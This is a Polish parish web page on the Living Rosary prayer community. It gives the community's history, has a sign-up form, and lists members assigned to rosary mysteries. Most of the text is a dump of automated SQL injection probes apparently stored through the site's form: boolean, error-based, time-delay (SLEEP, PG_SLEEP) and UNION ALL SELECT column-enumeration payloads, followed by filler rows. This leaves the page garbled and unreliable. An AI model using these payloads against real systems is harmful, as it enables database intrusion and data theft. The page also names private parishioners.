RÓŻA RÓŻAŃCOWA
Róża Różańcowa jest modlitewną wspólnotą 20 osób, z których każda codziennie we własnym zakresie odmawia jedną dziesiątkę różańca. Każda osoba przez miesiąc rozważa jedną, przydzieloną jej Tajemnicę Różańca Świętego, w ten sposób codziennie odmawiamy cały różaniec. Członkowie Róży korzystają z łask, jakie mogliby otrzymać, sami odmawiając cały Różaniec.

Żywy Różaniec to wspólnota religijna osób świeckich, które codziennie odmawiają Tajemnice Różańca. Wspólnoty te często nazywane są Różami. Pierwszą Różę założyła w roku 1826 w Lyonie sługa Boża Paulina Maria Jaricot. Wg Pauliny zjednoczenie serc w jedności tajemnic daje Różańcowi szczególną moc nawracania grzeszników. Podkreślała ona, że „w takiej piętnastce, złożonej z ludzi dobrych, przeciętnych oraz innych, którzy mają jedynie dobrą wolę z "piętnastu węgli”, z których jeden płonie, trzy lub cztery tlą się zaledwie, a pozostałe są zimne", wkrótce wszystkie razem wybuchną ogniem. I ten ogień płonie na całym świecie do dziś.

Do Polski dzieło to dotarło w XIX w. W krótkim czasie objęło niemal wszystkie parafie w kraju. Rozpoczynając 25 rok swojego pontyfikatu, Jan Paweł II w liście apostolskim zatytułowanym „Różaniec Dziewicy Maryi” ogłosił Rok Różańca (okres od października 2002 do października 2003 roku).Wtedy też Ojciec Święty wprowadził nową część różańca, tajemnice światła, uwzględniające lata publicznej działalności Pana Jezusa, „aby różaniec w pełniejszy sposób można było nazwać streszczeniem Ewangelii”. Odtąd cały różaniec liczy 20 tajemnic, a żywe Róże składają się z 20 osób.

Nastały „czasy elektroniczne”, dlatego proponujemy zapisać się do naszej Róży poprzez witrynę internetową. Należy tylko wypełnić poniższy formularz i zostaniemy automatycznie przypisani do Róży. Po zapełnieniu 20 miejsc, zostanie utworzona nowa róża. Zachęcamy parafian do tworzenia jak największej ilości róż, tak aby czerpać z łask, jakie niesie ze sobą codzienne odmawianie różańca św.


Przepraszamy! Róża jest już zapełniona. Należy poczekać, aż administrator utworzy kolejną różę. Zapraszamy ponownie niebawem.

Zwiastowanie MaryiDobrusia Ganda
Nawiedzenie św. ElżbietyMarcelina Prałat
Narodzenie JezusaZuzanna Marchewka
Ofiarowanie JezusaPatryk Sierant
Odnalezienie Jezusa w świątyniRemigiusz Ganda
Modlitwa Jezusa w ogrójcuAleksandra Piechowiak
Biczowanie JezusaZofia MARCHEWKA
Cierniem ukoronowanie
Droga krzyżowa
Jezus umiera na krzyżu
Zmartwychwstanie Jezusa
Wniebowstąpienie Jezusa
Zesłanie Ducha Św.
Wniebowzięcie Maryi
Ukoronowanie Maryi
Chrzest Jezusa w Jordanie
Wesele w Kanie Galilejskiej
Głoszenie Królestwa Bożego...
Przemienienie na górze Tabor
Ustanowienie Eucharystii
1 1
1 1
9440 1
1) AND 6785=4657 AND (9898=9898 1
1) AND 4732=4732 AND (8454=8454 1
1 AND 5647=3451 1
1 AND 4732=4732 1
1 AND 7462=7172-- TSsj 1
1 AND 4732=4732-- OzIl 1
0 1
1 1
0 1
0 1
(SELECT (CASE WHEN (9696=2983) THEN 9696 ELSE 9696*(SELECT 9696 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 1
(SELECT (CASE WHEN (9503=9503) THEN 9503 ELSE 9503*(SELECT 9503 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) 1
1) AND (SELECT 6309 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(6309=6309,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2326=2326 1
1 AND (SELECT 6309 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(6309=6309,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 1
1 AND (SELECT 6309 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(6309=6309,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- gCNm 1
1) AND 3631=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3631=3631) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113))) AND (9695=9695 1
1 AND 3631=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3631=3631) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113))) 1
1 AND 3631=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3631=3631) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113)))-- MXex 1
(SELECT 6056 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(6056=6056,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 1
(SELECT CONCAT(0x71706b7671,(SELECT (ELT(3994=3994,1))),0x717a7a7871)) 1
(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9434=9434) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113)) 1
1);SELECT SLEEP(5)# 1
1;SELECT SLEEP(5)# 1
1);SELECT PG_SLEEP(5)-- 1
1;SELECT PG_SLEEP(5)-- 1
1) AND SLEEP(5) AND (4679=4679 1
1 AND SLEEP(5) 1
1 AND SLEEP(5)-- enHa 1
0 1
0 1
1) AND 3430=(SELECT 3430 FROM PG_SLEEP(5)) AND (6377=6377 1
1 AND 3430=(SELECT 3430 FROM PG_SLEEP(5)) 1
1 AND 3430=(SELECT 3430 FROM PG_SLEEP(5))-- qjsh 1
1) ORDER BY 1-- iRDG 1
1) ORDER BY 7702-- hhEA 1
1) UNION ALL SELECT NULL-- oZsC 1
1) UNION ALL SELECT NULL,NULL-- HyKS 1
1) UNION ALL SELECT NULL,NULL,NULL-- BnFe 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL-- jTaO 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- IIfe 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- OOiB 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- OfKd 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- xhmN 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RDqi 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QdUz 1
1 ORDER BY 1-- tSwJ 1
1 ORDER BY 3396-- yxRN 1
1 UNION ALL SELECT NULL-- EFVF 1
1 UNION ALL SELECT NULL,NULL-- Fbsf 1
1 UNION ALL SELECT NULL,NULL,NULL-- BHRP 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL-- zQkC 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- UmUQ 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- EPqE 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IwJO 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IKVb 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CGQB 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- frEY 1
1 ORDER BY 1-- bNKG 1
1 ORDER BY 6853-- KoHt 1
1 UNION ALL SELECT NULL-- CYWk 1
1 UNION ALL SELECT NULL,NULL-- abqr 1
1 UNION ALL SELECT NULL,NULL,NULL-- CMdK 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL-- cGAB 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- lawA 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- EERr 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- goFE 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- AEFP 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oUlF 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XDtr 1
1) ORDER BY 1# 1
1) ORDER BY 6724# 1
1) UNION ALL SELECT NULL# 1
1) UNION ALL SELECT NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 ORDER BY 1# 1
1 ORDER BY 1356# 1
1 UNION ALL SELECT NULL# 1
1 UNION ALL SELECT NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 ORDER BY 1# 1
1 ORDER BY 7843# 1
1 UNION ALL SELECT NULL# 1
1 UNION ALL SELECT NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 5289
1 1()),,,'))
1 1) AND 3968=3836 AND (4705=4705
1 1) AND 1872=1872 AND (8986=8986
1 1 AND 7372=5512
1 1 AND 1872=1872
1 1 AND 6782=7848-- PTov
1 1 AND 1872=1872-- WaJS
1 0
1 1
1 0
1 0
1 (SELECT (CASE WHEN (7550=1513) THEN 7550 ELSE 7550*(SELECT 7550 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
1 (SELECT (CASE WHEN (1180=1180) THEN 1180 ELSE 1180*(SELECT 1180 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
1 1) AND (SELECT 9883 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(9883=9883,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (8859=8859
1 1 AND (SELECT 9883 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(9883=9883,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 1 AND (SELECT 9883 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(9883=9883,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- HMpX
1 1) AND 8426=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8426=8426) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113))) AND (9351=9351
1 1 AND 8426=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8426=8426) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113)))
1 1 AND 8426=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8426=8426) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113)))-- CAgr
1 (SELECT 8570 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(8570=8570,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 (SELECT CONCAT(0x71706b7671,(SELECT (ELT(9055=9055,1))),0x717a7a7871))
1 (SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7051=7051) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113))
1 1);SELECT SLEEP(5)#
1 1;SELECT SLEEP(5)#
1 1);SELECT PG_SLEEP(5)--
1 1;SELECT PG_SLEEP(5)--
1 1) AND SLEEP(5) AND (1184=1184
1 1 AND SLEEP(5)
1 1 AND SLEEP(5)-- VKWD
1 0
1 0
1 0
1 1
1 1
1 1
1 0
1 0
1 1
1) AND (SELECT 4198 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(4198=4198,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4226=4226 1
1 AND (SELECT 4198 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(4198=4198,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 1
1 AND (SELECT 4198 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(4198=4198,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- uFpY 1
(SELECT 7482 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(7482=7482,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) 1
1) AND 4886=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4886=4886) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113))) AND (8636=8636 1
1 AND 4886=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4886=4886) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113))) 1
1 AND 4886=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4886=4886) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113)))-- CBTz 1
1) ORDER BY 1-- VeUj 1
1) ORDER BY 6594-- WCFw 1
1) UNION ALL SELECT NULL-- cnwc 1
1) UNION ALL SELECT NULL,NULL-- aVsA 1
1) UNION ALL SELECT NULL,NULL,NULL-- Msmq 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL-- WnQG 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- pdtN 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- YlYi 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- talI 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VkTn 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hxRp 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zIpg 1
1 ORDER BY 1-- WEKO 1
1 ORDER BY 2317-- lUvi 1
1 UNION ALL SELECT NULL-- kWTe 1
1 UNION ALL SELECT NULL,NULL-- hVVb 1
1 UNION ALL SELECT NULL,NULL,NULL-- PzpO 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL-- Chmj 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- Cmhg 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- EsDi 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- lvCT 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SASd 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- tePn 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rmQs 1
1 ORDER BY 1-- kOOl 1
1 ORDER BY 8968-- bGWC 1
1 UNION ALL SELECT NULL-- jmXN 1
1 UNION ALL SELECT NULL,NULL-- iREy 1
1 UNION ALL SELECT NULL,NULL,NULL-- mBTI 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL-- hgfN 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- fNyA 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- WbBe 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oxcB 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- LkqO 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Wvxu 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PVBW 1
1) ORDER BY 1# 1
1) ORDER BY 5797# 1
1) UNION ALL SELECT NULL# 1
1) UNION ALL SELECT NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 ORDER BY 1# 1
1 ORDER BY 5288# 1
1 UNION ALL SELECT NULL# 1
1 UNION ALL SELECT NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 ORDER BY 1# 1
1 ORDER BY 2781# 1
1 UNION ALL SELECT NULL# 1
1 UNION ALL SELECT NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# 1
1 1) AND (SELECT 2597 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(2597=2597,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (4409=4409
1 1 AND (SELECT 2597 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(2597=2597,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 1 AND (SELECT 2597 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(2597=2597,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- uzeQ
1 (SELECT 6318 FROM(SELECT COUNT(*),CONCAT(0x71706b7671,(SELECT (ELT(6318=6318,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
1 1) AND 9876=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9876=9876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113))) AND (7861=7861
1 1 AND 9876=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9876=9876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113)))
1 1 AND 9876=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (9876=9876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113)))-- CGaK
1 1) ORDER BY 1-- MsmF
1 1) ORDER BY 6147-- OYXd
1 1) UNION ALL SELECT NULL-- UkdT
1 1) UNION ALL SELECT NULL,NULL-- xbPq
1 1) UNION ALL SELECT NULL,NULL,NULL-- iqzF
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL-- nHUJ
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- aNei
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- vHHT
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nedD
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- jItp
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- DWnp
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- vRYg
1 1 ORDER BY 1-- dwIf
1 1 ORDER BY 8897-- pVat
1 1 UNION ALL SELECT NULL-- htvo
1 1 UNION ALL SELECT NULL,NULL-- pfnV
1 1 UNION ALL SELECT NULL,NULL,NULL-- twFQ
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL-- VFZv
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- mkjA
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- egFH
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- OLUs
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- OFbb
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- qKcb
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- TGWl
1 1 ORDER BY 1-- eBuZ
1 1 ORDER BY 5478-- fITf
1 1 UNION ALL SELECT NULL-- SntX
1 1 UNION ALL SELECT NULL,NULL-- lwbD
1 1 UNION ALL SELECT NULL,NULL,NULL-- PWUc
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL-- csvy
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- zcNL
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- AkUI
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Krml
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hyEl
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CYLo
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- BSvJ
1 1) ORDER BY 1#
1 1) ORDER BY 2930#
1 1) UNION ALL SELECT NULL#
1 1) UNION ALL SELECT NULL,NULL#
1 1) UNION ALL SELECT NULL,NULL,NULL#
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL#
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1 ORDER BY 1#
1 1 ORDER BY 8358#
1 1 UNION ALL SELECT NULL#
1 1 UNION ALL SELECT NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1 ORDER BY 1#
1 1 ORDER BY 4517#
1 1 UNION ALL SELECT NULL#
1 1 UNION ALL SELECT NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
1 1
